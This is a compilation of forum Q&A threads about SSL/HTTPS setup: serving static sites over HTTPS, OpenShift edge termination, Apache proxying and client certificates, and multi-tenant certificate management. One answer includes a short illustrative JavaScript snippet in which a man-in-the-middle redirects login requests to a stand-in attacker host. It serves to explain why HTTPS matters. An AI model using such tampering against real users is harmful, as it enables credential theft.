SSL for statically served web application

I'm building a serverless web application. My HTML, CSS and JavaScript are in a public storage location which my domain example.com points towards.
When my users navigate to my domain using their browser, their browser will GET these files from that location and then there is no further communication with example.com. The JavaScript application runs in the browser and communicates with a separate backend via HTTPS (in my case AWS, but could be e.g. Azure, Kinvey, BlueMix or others).
It therefore seems to me that there is no reason to encrypt the communication between my users' web browsers and example.com, i.e. I don't need to provide https://example.com, and doing so would provide no security benefit.
Am I correct?
The reason I ask is that I found at least two static hosting services which offer SSL support:
https://www.netlify.com/features#security
https://surge.sh/help/using-https-by-default
I am aware of the reasons for wanting HTTPS (described in the second link above and also at https://levels.io/default-to-https/ ...) but none of this seems to apply to my situation.
I believe this is a serious question because more applications will be built in this manner (the folks at http://serverlessconf.io/ certainly think so), and as long as the channel to the actual backend is secured there is no reason to secure the channel to what is essentially a read-only hard disk.

If you don't secure communication with example.com, then a man-in-the-middle attacker (e.g. a rogue Wi-Fi hotspot) could modify the HTML and JavaScript loaded by users.
One way to use this would be to change the JavaScript so that subsequent API requests are sent to attacker-controlled servers instead of yours, compromising any credentials or information transferred.
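As a purely hypothetical illustration (the host names below are invented), the tampering can be as small as changing one constant in the served JavaScript:

```javascript
// What example.com originally serves (hypothetical):
// const API_BASE = "https://api.example.com";

// What the man-in-the-middle delivers instead; the browser still
// happily uses HTTPS for the API calls, but to the attacker's host:
const API_BASE = "https://api.evil.example.net";

async function login(username, password) {
  return fetch(`${API_BASE}/login`, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ username, password }),
  });
}
```

Serving the static files over HTTPS is what prevents that first modification, which is why static hosts like the ones you linked offer it even for purely static content.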

Related

OpenShift SSL edge termination risk

I have been reading the OpenShift documentation for secured (SSL) routes.
Since I use a free plan, I can only have an "Edge Termination" route, meaning the SSL connection is terminated at the router, with contents being transmitted from the router to the internal service via plain HTTP.
Is this secure? I mean, part of the transmission is done via HTTP in the end.
The connection between where the secure connection is terminated and your application which accepts the proxied plain HTTP request is all internal to the OpenShift cluster. It doesn't travel through any public network in the clear. Further, the way the software defined networking in OpenShift works, it is not possible for any other normal user to see that traffic, nor can applications running in other projects see the traffic.
The only people who might be able to see the traffic are administrators of the OpenShift cluster, but those same people could also access your application container. Any administrator of the system could access your application container even if you used a pass-through secure connection terminated in your application. So it is the same situation as most managed hosting, where you rely on the administrators of the service to do the right thing.

Structuring an application with its API

I am currently developing a web application to allow customers to place orders.
The way I have chosen to handle the application structure is to split the app into two sub-applications:
1 backend application (the API) that serves only JSON content
1 front-end application (AngularJS in my case) that takes an API URL as configuration and serves user content
Now on the server, what I have done for testing, is creating 2 virtual hosts:
app.com
api.app.com
and linked the API to the frontend app.
The problem is that everything will be served over https and, in the current setup, I will need to buy either 2 SSL certificates, or 1 wildcard certificate.
The second solution would be to create a subdirectory in the frontend app (let's say /api) and copy the backend app into it. The advantage would be to need only a single SSL certificate and to have everything under the same directory; /api would be an .htaccess redirect to the backend API.
I think that the "cleanest" solution would be to split the two apps completely and get a wildcard SSL certificate for both, but I'd like to hear if someone has experience with whether one solution is better than the other.
The advantage of combining is that you will get to avoid CORS. CORS isn't that bad, but it's another complication. That being said, if you want to expose this to the outside world (allow other web pages to use it), you might want to go through that process anyway.
If you aren't looking to actually expose your API to third parties, but just want to keep your layers separate, then I would look at either combining or even proxying. I've used this architecture to put my services completely behind the firewall and use mod_proxy or the like to serve my API through my web server. This is useful as it limits the exposure of your API, and it solves CORS issues in one go.
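For example, a rough sketch of that proxy approach (paths, the backend port and the certificate locations are assumptions, not from your setup) on the app.com virtual host:

```apache
<VirtualHost *:443>
    ServerName app.com
    DocumentRoot /var/www/app

    SSLEngine on
    SSLCertificateFile    /etc/ssl/certs/app.com.crt
    SSLCertificateKeyFile /etc/ssl/private/app.com.key

    # Requires mod_proxy and mod_proxy_http.
    # Everything under /api/ is forwarded to the backend API, which here
    # is assumed to listen only on localhost:8080; the browser never talks
    # to a second host, so one certificate suffices and no CORS is needed.
    ProxyPreserveHost On
    ProxyPass        /api/ http://127.0.0.1:8080/
    ProxyPassReverse /api/ http://127.0.0.1:8080/
</VirtualHost>
```

The AngularJS app can then simply be configured with /api as its API URL.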
If you really want to use SSL between your web server and your API server, you can set up a self-generated client certificate between the two.

How to implement an SSL Client Certificate on an Apache server for a REST API?

Background:
Imagine a website, visible to the world, https://www.example.com, with a static IP address, 1.1.1.1. This site is hosted on an Apache server and already possesses an SSL Server Certificate.
On the other hand, inside a protected internal network, not visible to the world, a server (https://www.myinternalserver.com), with a static IP address (2.2.2.2), also running Apache, runs some internal web-based applications.
A static IP address (3.3.3.3) that maps to a subdomain (myapps) of the external site (https://myapps.example.com) serves as the entry point to the server where the internal web-based applications reside.
A firewall that protects the internal network does the redirect/proxying so all external traffic going to 3.3.3.3 is redirected internally to 2.2.2.2.
The firewall also limits all external traffic so that any calls going to 3.3.3.3 must originate from 1.1.1.1, in essence making the external website (https://www.example.com) the only authorized caller of the internal server (https://www.myinternalserver.com).
Scenario:
With this infrastructure in place, I can make REST calls from the external website into the internal network and send back data to use in the pages. So, in this scenario, the external site is the client and the internal application, the server.
Question:
But beyond that, I want the server in the internal network to issue an "SSL Client Certificate" that would be "installed" (I don't know if this is the correct term) in the external website, so that all calls from the external site would have to be authenticated against this certificate.
How do I accomplish this?
Breaking the question:
I know that the question above is very broad, so let me try to break it into three (not so) "smaller" questions:
1 - How do I create the key/certificate? Using OpenSSL and some online recipes (this is one of them: http://www.impetus.us/~rjmooney/projects/misc/clientcertauth.html), I was able to generate the certificate file and learned (or so I believe) what I have to do with it and what to change in the httpd.conf file. In any case, I would like to feel more secure about what I have done, so any suggestions/guidance here would be highly appreciated. For example, is the recipe I used any good?
2 - How to "install/transfer" this certificate to the external site? Do I simply copy/send one of the files created when generating the certificate? If so, which one? Where specifically does it go in the client server (external site)? Do they have to do anything at their end? If not, what is the process? I tried to contact the hosting company but I don't know if Icouldn't explain it to them or if they don't have experience with "SSL Client Certificate". All they told me is that there's already an SSL Certificate installed (SSL Server Certificate). They don't even seem to know what a "SSL Client Certificate" is.
3 - Once the certificate is in place, what can I do to guarantee that ALL calls to the internal server, by default, come with the certificate, without the need to code it into each API I create? I know very little about certificates, so it might be possible that it always happens "by default", but I read online about certificates that are "embedded" in the header of the API call, so I just want to be sure.
Thank you.
After some more research, this is what I found...
1 - How do I create the key/certificate?
I had to try other recipes and use a combination of them to get what I wanted. What I learned is that I have to create a certificate (CA Certificate) first, and generate the Server and Client certificates based on that first one. So look for recipes that encompass all three certificates: CA, Server, Client.
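For what it's worth, here is a minimal sketch of that three-certificate recipe, assuming OpenSSL on the command line (file names, subjects and lifetimes are placeholders, not a hardened setup):

```bash
# 1. Your own CA: a key and a self-signed CA certificate.
openssl genrsa -out ca.key 4096
openssl req -new -x509 -days 3650 -key ca.key -out ca.crt \
    -subj "/CN=My Internal CA"

# 2. Server certificate for the internal server, signed by that CA.
openssl genrsa -out server.key 2048
openssl req -new -key server.key -out server.csr \
    -subj "/CN=www.myinternalserver.com"
openssl x509 -req -days 365 -in server.csr \
    -CA ca.crt -CAkey ca.key -CAcreateserial -out server.crt

# 3. Client certificate for the external site, signed by the same CA.
openssl genrsa -out client.key 2048
openssl req -new -key client.key -out client.csr \
    -subj "/CN=www.example.com"
openssl x509 -req -days 365 -in client.csr \
    -CA ca.crt -CAkey ca.key -CAcreateserial -out client.crt
```

On the internal server, the httpd.conf side of question 1 (which also enforces question 3 on the server side) then looks roughly like this, assuming mod_ssl is enabled and with example paths:

```apache
SSLEngine on
SSLCertificateFile    /etc/pki/tls/certs/server.crt
SSLCertificateKeyFile /etc/pki/tls/private/server.key
SSLCACertificateFile  /etc/pki/tls/certs/ca.crt

# Refuse any request that does not present a client certificate
# signed by the CA above.
SSLVerifyClient require
SSLVerifyDepth  1
```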
2 - How to install/transfer this certificate to the external site?
Actually, you simply copy the necessary ones (client/CA) to a safe place in your share of the external site, somewhere outside the "www" tree.
3 - Once the certificate is in place, what can I do to guarantee that ALL calls...
Well, here is what I did.
I "objectified my API call using php/libcURL and place it too, outside the "www" tree. For any developer in my site to use it, all they have to do is create an instance of the object and make the call by passing the URL as a parameter. In other words, you don't install the certificate. Instead, you make a call to the certificates each time you make a call to the internal server.
I hope it helps someone out there.

Managing SSL certs for a multi-tenant website

We have a multi-tenant website where we use a wildcard SSL cert to give people a subdomain to our site. Some of our customers would like to use their own domain, but I'm concerned about how we would manage each customer's certificate as our business grows. Currently the certificate resides on the web server, which means loading all of the certs to each web server as we add them.
I'm aware we could introduce a dedicated SSL device in front of the web servers, but are there other options to improve the management of these certificates?
I'm a Microsoft Technical Evangelist and one of my partners had exactly the same challenge.
I have created sample source code that automates and manages SSL certificates for multiple domain bindings using a new IIS 8 (Windows Server 2012) feature called SNI, which is essentially SSL host headers.
All you will need to do is reuse my code (it's quite simple) and upload your custom SSL certificates to blob storage, or you can write your own provider to fetch custom domains and certificates from your database.
I have posted a detailed explanation and a sample "plug & play" source-code at:
http://www.vic.ms/microsoft/windows-azure/multiples-ssl-certificates-on-windows-azure-cloud-services/
You could make your clients deal with their own certificates and have them run their own https site. They can serve a page containing a single frame with your content (over https). The users will see their domain and their certificate, and the browser will load the frame without complaining as long as the frame contents are also loaded over a valid https connection. I created a quick and dirty test page so you can see it in action.
This solution will 'break' the address bar, as it will keep the URL of the page containing the frame. Depending on the type of site you're running, this might be a showstopper.

SSL Linking Strategy In Applications

I'm interested in hearing what others do when, in a given application, some pages need to be secure and others don't. Take any solution off the table that requires a separate domain/subdomain. In this case, all calls, secure or insecure, will link to the same domain. I see a few options:
1. The ham-fisted, just secure it all approach.
2. A URI rewrite solution that ensures the pages that need to be secure are accessed via the https protocol and either ignores other pages or, alternatively, forces those to standard http.
3. An application-centric approach where each link is responsible for knowing what it's pointing to and applying the correct protocol. In this solution, all links would have to be fully qualified.
4. A laissez-faire version of the application-centric approach where links to secure pages are fully qualified and links to other pages are not. In this case, the protocol would be inherited for pages not handled explicitly, and inconsequential pages may be accessed via https.
I've used several of these from time to time, but they all have drawbacks. What's everyone else doing in these situations? Is there another path I haven't considered?
UPDATE:
vartec's answer below made me realize that I'd left out one critical piece of information. In my network config, all SSL-handling is taken care of at the load balancer level. The LB, then, communicates with the web server cluster via port 80. As a result, the applications themselves have no idea whether traffic arrived securely. All they see is a port 80 connection.
Thanks.
I use a mixture of #4 and #2: try to specify absolute URLs where possible when I need to switch protocols, and implement server-side redirection to catch any links I haven't used absolute URLs on (or if someone accesses the URL directly, not by following a link).
In my view, the one essential thing is that the pages which need to be accessed securely (form submissions etc.) are accessed securely, and for that I use Apache's SSLRequireSSL directive. It makes it easy to verify to myself that certain pages will never be accessed except over SSL.
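For reference, a minimal sketch of that combination (the directory names and hosts are examples, and it assumes mod_ssl and mod_rewrite are loaded):

```apache
# Pages that must only ever be served over SSL; plain-HTTP access
# is refused outright rather than silently allowed.
<Directory "/var/www/app/checkout">
    SSLRequireSSL
</Directory>

# Server-side redirection on the plain-HTTP virtual host to catch
# relative links or directly typed URLs.
<VirtualHost *:80>
    ServerName www.example.com
    RewriteEngine On
    RewriteRule ^/(checkout|account)(.*)$ https://www.example.com/$1$2 [R=301,L]
</VirtualHost>
```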
I'm for the ham-fisted secure it all approach, but then you took my real solution off the table by (strangely to my mind) excluding domain/subdomain solutions. Errors in securing the site are far more dangerous than a bit of processing overhead.
We have our main site, which is insecure (but mainly marketing) and then we have the application site which is a different subdomain. Simple, easy and effective. Why take that option off the table?
Application-centric approach, where the controller for each page knows whether it has to be secure. If it needs to be secure but it's accessed via insecure http, redirect to https, passing along all of the parameters.
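A rough sketch of that check, written here in PHP purely as an illustration, and assuming (per the update above) that the SSL-terminating load balancer adds an X-Forwarded-Proto header, since the application itself only ever sees a port 80 connection:

```php
<?php
// Hypothetical helper called at the top of any controller that must be secure.
function require_https()
{
    // Behind the load balancer every request arrives over plain HTTP,
    // so the original scheme has to come from a forwarded header.
    $proto = isset($_SERVER['HTTP_X_FORWARDED_PROTO'])
        ? $_SERVER['HTTP_X_FORWARDED_PROTO']
        : 'http';

    if ($proto !== 'https') {
        // Same host, same path, same query string, just over HTTPS.
        $target = 'https://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
        header('Location: ' . $target, true, 301);
        exit;
    }
}
```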